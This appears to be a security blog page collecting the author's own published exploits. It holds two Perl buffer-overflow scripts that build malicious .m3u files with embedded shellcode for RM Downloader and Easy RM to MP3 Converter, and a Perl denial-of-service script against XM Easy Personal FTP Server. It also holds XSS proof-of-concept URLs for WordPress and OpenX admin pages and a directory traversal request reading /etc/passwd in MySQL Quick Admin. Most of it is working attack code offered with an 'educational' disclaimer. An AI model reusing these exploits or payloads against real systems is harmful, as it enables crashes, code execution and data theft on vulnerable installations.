SecurityGyan

This Vulnerability was discovered two months ago. I wrote this exploit to refine my exploit writing skills.

#!/usr/bin/perl
# *********************************************************
# * RM Downloader 3.0.2.1 (.M3U File) Stack Overflow exploit *
# *********************************************************
#
# Author: Vinod Sharma
# Download : http://www.rm-to-mp3.net/downloads/RMDownloader.exe
# Tested : Windows XP SP2 (En)
# Thanks to exploit-db,packetstormsecurity and all security folks
# Published at exploit-db.com: http://www.exploit-db.com/exploits/10423
#Vulnerability discovered by CYBER-ZONE(http://www.exploit-db.com/exploits/8404)
#::::::NOTE: This exploit is only for educational purpose. If you use it for any malicious activity then author will not bear any #::::responsibility.

my $Header = “#EXTM3U\n”;
my $eip= pack(‘V’, 0×01be8b59); # jmp esp from RDcodec02.dll
my $nop= “\x90″ x 256;
my $nop2=”\x90″ x 8;
my $nop3=”\x90″ x 100;

####Calc.exe#####
$shellcode = $shellcode.
“\x31\xc9\xda\xd4\xb1\x33\xbd\xec\x71\x94\xde\xd9\x74\x24\xf4″.
“\x5f\x31\x6f\x15\x03\x6f\x15\x83\x2b\x75\x76\x2b\x4f\x9e\xff”.
“\xd4\xaf\x5f\x60\x5c\x4a\x6e\xb2\x3a\x1f\xc3\x02\x48\x4d\xe8″.
“\xe9\x1c\x65\x7b\x9f\x88\x8a\xcc\x2a\xef\xa5\xcd\x9a\x2f\x69″.
“\x0d\xbc\xd3\x73\x42\x1e\xed\xbc\x97\x5f\x2a\xa0\x58\x0d\xe3″.
“\xaf\xcb\xa2\x80\xed\xd7\xc3\x46\x7a\x67\xbc\xe3\xbc\x1c\x76″.
“\xed\xec\x8d\x0d\xa5\x14\xa5\x4a\x16\x25\x6a\x89\x6a\x6c\x07″.
“\x7a\x18\x6f\xc1\xb2\xe1\x5e\x2d\x18\xdc\x6f\xa0\x60\x18\x57″.
“\x5b\x17\x52\xa4\xe6\x20\xa1\xd7\x3c\xa4\x34\x7f\xb6\x1e\x9d”.
“\x7e\x1b\xf8\x56\x8c\xd0\x8e\x31\x90\xe7\x43\x4a\xac\x6c\x62″.
“\x9d\x25\x36\x41\x39\x6e\xec\xe8\x18\xca\x43\x14\x7a\xb2\x3c”.
“\xb0\xf0\x50\x28\xc2\x5a\x3e\xaf\x46\xe1\x07\xaf\x58\xea\x27″.
“\xd8\x69\x61\xa8\x9f\x75\xa0\x8d\x40\x94\x61\xfb\xe8\x01\xe0″.
“\x46\x75\xb2\xde\x84\x80\x31\xeb\x74\x77\x29\x9e\x71\x33\xed”.
“\x72\x0b\x2c\x98\x74\xb8\x4d\x89\x16\x5f\xde\x51\xf7\xfa\x66″.
“\xf3\x07″;

$ex=”http://F”.$nop.$eip.$nop2.$shellcode.”A” x 26280 ;

open(MYFILE,’>>exploit.m3u’);

print MYFILE $Header.$ex;

close(MYFILE);

#Hi to all security folks.
#This is my first exploit with embedded shellcode. I am dedicating this to my friend Praveen.
#Thanks to him for motivating me to achieve this level. Thanks to all the security folks.
#I know this is basic or 1st level stuff in exploit developers community but today i can confidently
#say that i am one of them. I will continue to improve my skills to help the community.
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$$$$$$
#$$$$$Author will not bare any responsibility for any damages whatsoever.$$$$$$$$$$$$$$
#Just give it a shot you will see calc.exe.

#!/usr/bin/perl
# Easy RM to MP3 Converter 2.7.3.700 (.m3u) File WinXP Sp2 Buffer Overflow Exploit
# Author: Vinod Sharma
#exploit published at: http://www.exploit-db.com/exploits/10374
# Download : http://www.rm-to-mp3.net/EasyRMtoMP3Converter.exe
# Tested : Windows XP SP2 (En)
# Thanks to exploit-db
#Vulnerability discovered by CYBER-ZONE
#Advisory:http://secunia.com/advisories/34653
my $file= “exploit.m3u”;
my $junk= “\x41″ x 26059;
my $eip= pack(‘V’, 0×01a8f23a);
my $shellcode= “\x90″ x 25;

#/*
#* windows/exec – 223 bytes
#* http://www.metasploit.com
#* Encoder: x86/shikata_ga_nai
#* EXITFUNC=thread, CMD=calc
#*/
$shellcode = $shellcode.
“\x31\xc9\xda\xd4\xb1\x33\xbd\xec\x71\x94\xde\xd9\x74\x24\xf4″.
“\x5f\x31\x6f\x15\x03\x6f\x15\x83\x2b\x75\x76\x2b\x4f\x9e\xff”.
“\xd4\xaf\x5f\x60\x5c\x4a\x6e\xb2\x3a\x1f\xc3\x02\x48\x4d\xe8″.
“\xe9\x1c\x65\x7b\x9f\x88\x8a\xcc\x2a\xef\xa5\xcd\x9a\x2f\x69″.
“\x0d\xbc\xd3\x73\x42\x1e\xed\xbc\x97\x5f\x2a\xa0\x58\x0d\xe3″.
“\xaf\xcb\xa2\x80\xed\xd7\xc3\x46\x7a\x67\xbc\xe3\xbc\x1c\x76″.
“\xed\xec\x8d\x0d\xa5\x14\xa5\x4a\x16\x25\x6a\x89\x6a\x6c\x07″.
“\x7a\x18\x6f\xc1\xb2\xe1\x5e\x2d\x18\xdc\x6f\xa0\x60\x18\x57″.
“\x5b\x17\x52\xa4\xe6\x20\xa1\xd7\x3c\xa4\x34\x7f\xb6\x1e\x9d”.
“\x7e\x1b\xf8\x56\x8c\xd0\x8e\x31\x90\xe7\x43\x4a\xac\x6c\x62″.
“\x9d\x25\x36\x41\x39\x6e\xec\xe8\x18\xca\x43\x14\x7a\xb2\x3c”.
“\xb0\xf0\x50\x28\xc2\x5a\x3e\xaf\x46\xe1\x07\xaf\x58\xea\x27″.
“\xd8\x69\x61\xa8\x9f\x75\xa0\x8d\x40\x94\x61\xfb\xe8\x01\xe0″.
“\x46\x75\xb2\xde\x84\x80\x31\xeb\x74\x77\x29\x9e\x71\x33\xed”.
“\x72\x0b\x2c\x98\x74\xb8\x4d\x89\x16\x5f\xde\x51\xf7\xfa\x66″.
“\xf3\x07″;

$shellcode = $shellcode.”\x90″ x 25;
open($FILE, “>$file”);
print($FILE $junk.$eip.$shellcode);
close($FILE);
print(“exploit created successfully”);

#!usr/bin/perl -w

####################################################################
# XM Easy Personal FTP Server 5.x allows remote attackers to cause a denial of service
# via a “HELP” or “TYPE” command with an overly long argument.
# Refer:
# http://secunia.com/advisories/35271/
#http://downloads.securityfocus.com/vulnerabilities/exploits/35239-2.pl
#
# Product link: http://www.dxm2008.com/
# Vunerbility discovered by: NeerajT of Nevis Labs
#http://hypersecurity.blogspot.com/2009/06/xm-personal-ftp-server-vulnerability.html

#
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$$$$$$
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$
#
# Author: Vinod Sharma
# Email: vinodsharma[underscore]mimit[at]gmail.com
# Blog: http://securitygyan.com/
# Date: 09th june, 2009
#
#
###Thanks to all the Security Folks###
###################################################################

use IO::Socket;

my $server_ip=$ARGV[0];
my $server_port=$ARGV[1];
my $username=$ARGV[2];
my $password=$ARGV[3];
my $command=$ARGV[4];
my $buffer=$command .” ” .”\x41″ x 10000 .”\r\n”;

if(($#ARGV + 1)!=5)
{
print “\nUsage: XM_FTP_Serv_Exploit.pl server_ip_address server_port username password command\n”;
print “\nargument command can have a value HELP or TYPE\n”;
print “\nExample: XM_FTP_Serv_Exploit.pl 192.16.16.8 21 anonymous 123456 HELP”;

exit;
}

$socket = new IO::Socket::INET (PeerAddr =>$server_ip, PeerPort => $server_port, Proto => ‘tcp’, ) or die “Couldn’t connect to Server\n”;

while (1)
{

$socket->recv($recv_data,1024);
print “RECIEVED: $recv_data”;

$send_data1 =”USER “.$username.”\r\n”;
$socket->send($send_data1);
$socket->recv($recv_data1,1024);
print “RECIEVED: $recv_data1″;

$send_data2 =”PASS “.$password.”\r\n”;
$socket->send($send_data2);
$socket->recv($recv_data2,1024);
print “RECIEVED: $recv_data2″;

$socket->send($buffer);
print “\nAttack is send…………………\n”;
$socket->recv($recv_data3,1024);
print “RECIEVED: $recv_data3″;

close $socket;

}

XSS vulnerability exists in wp-comments-post.php file while submitting a comment form to this php script.

Step1:Insert XSS paylod into comment form and submit it.

payload: <#script>alert(String.fromCharCode(88,83,83))

Note:remove # character from starting script tag in payload to reproduce this vulnerability.

Step2: When other user view the infected page, it will result in exploitation.

Severity is low because only a registered user can exploit this issue.

###############################################################################

OpenX 2.6.3 orderdirection and listorder parameter XSS Vulnerability

Input passed to the “orderdirection” and “listorder” parameters in
“www/admin/userlog-index.php” and “www/admin/stats.php” is not
properly sanitised before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user’s
browser session in the context of an affected site.

Vulnerability fixed in 2.6.4

http://www.openx.org/ad-server/download

Published at:http://www.packetstormsecurity.org/0902-exploits/openxorderdir-xss.rar
###############################################################################

exploit1:
filename:www/admin/userlog-index.php
parameter:listorder

POC:

http://172.16.4.113/openx-2.6.3/www/admin/userlog-index.php?listorder=updated’;<#script>alert(String.fromCharCode(88,83,83))&orderdirection=down

exploit2:
filename:www/admin/userlog-index.php
parameter:orderdirection

POC:

http://172.16.4.113/openx-2.6.3/www/admin/userlog-index.php?listorder=updated&orderdirection=down';<#script>alert(String.fromCharCode(88,83,83))

exploit3:
filename:www/admin/stats.php
parameter:listorder

POC:

http://172.16.4.113/openx-2.6.3/www/admin/stats.php?statsBreakdown=day&listorder=name';<#script>alert(String.fromCharCode(88,83,83))&orderdirection=up&day=&setPerPage=15&entity=global&breakdown=history&period_preset=all_stats&period_start=&period_end=

exploit4:
filename:www/admin/stats.php
parameter:orderdirection

POC:

http://172.16.4.113/openx-2.6.3/www/admin/stats.php?statsBreakdown=day&listorder=name&orderdirection=up';<#script>alert(String.fromCharCode(88,83,83))&day=&setPerPage=15&entity=global&breakdown=history&period_preset=all_stats&period_start=&period_end=

Note:remove # character from starting script tag in all pocs to reproduce this vulnerability.

###############################################################################

###############################################################################

OpenX 2.6.3 clientid parameter XSS Vulnerability

Input passed to the “clientid” parameter in “www/admin/banner-
acl.php”, “www/admin/banner-edit.php”, “www/admin/campaign-zone.php”,
“www/admin/advertiser-campaigns.php”, “www/admin/campaign-
banners.php”, and “www/admin/banner-activate.php” is not properly
sanitised before being returned to the user.

Vulnerability fixed in 2.6.4

http://www.openx.org/ad-server/download

parameter:clientid

published at: http://www.packetstormsecurity.org/0902-exploits/openxclient-xss.rar
###############################################################################

exploit1:
filename:www/admin/banner-acl.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/banner-acl.php?clientid=1′;<#script>alert(String.fromCharCode(88,83,83))&campaignid=1&bannerid=1

exploit2:
filename:www/admin/banner-edit.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/banner-edit.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))&campaignid=1&bannerid=1

exploit3:
filename:www/admin/campaign-zone.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/campaign-zone.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))&campaignid=1

exploit4:
filename:www/admin/advertiser-campaigns.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/advertiser-campaigns.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))

exploit5:
filename:www/admin/campaign-banners.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/campaign-banners.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))&campaignid=1

exploit6:
filename:www/admin/banner-activate.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/banner-activate.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))&campaignid=1&bannerid=1&value=0

Note:remove # character from starting script tag in all pocs to reproduce this vulnerability.
###############################################################################

###############################################################################
Directory traversal vulnerability in MySQL Quick Admin 1.5.5 allows remote attackers to read and execute arbitrary files via a .. (dot dot)
in the lang parameter to actions.php.

published at milworm :http://www.milw0rm.com/exploits/7020

###############################################################################

POC:http://www.example.com/quickadmin/actions.php?act=27&do=lang?=../../../../../../../../../../etc/passwd%00

###############################################################################
references:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4454

http://secunia.com/advisories/31820

###############################################################################

# milw0rm.com [2008-11-06]